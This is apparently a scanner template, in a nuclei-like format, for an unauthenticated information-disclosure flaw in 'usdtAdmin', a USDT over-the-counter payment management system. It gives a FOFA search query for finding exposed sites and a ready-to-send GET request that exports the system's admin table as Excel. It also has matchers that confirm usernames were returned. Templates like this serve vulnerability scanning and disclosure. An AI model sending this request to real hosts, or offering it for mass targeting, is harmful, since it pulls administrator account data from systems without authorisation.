## id: VEID-2025-0906
## name: usdtAdmin收款管理系统存在excel敏感信息泄露
## author: hack007x
## severity: high
## tags: veid,info,veid2025
## description: 虚拟币买卖USDT场外交易所由于在鉴权方面存在疏漏，导致了可未授权访问，从而导致信息泄露
## fofa-query: "/usdtmerchant/login/reg.html"
## verification: true


GET /index/getway/excel?down=1&table=ea_system_admin&shunxu=desc&number=100 HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "text/html"
#@ matcher: body contains "<th>username</th>"
#> extract: name=db_table, from=body, regex=/USDT数据库([a-z_]+)表的数据/, group=1





# @VEIL-STAMP: dd494456c7bea342c071c3dd7a7a94c3efbbfa8c43b37dd8393f76ffb0f69236
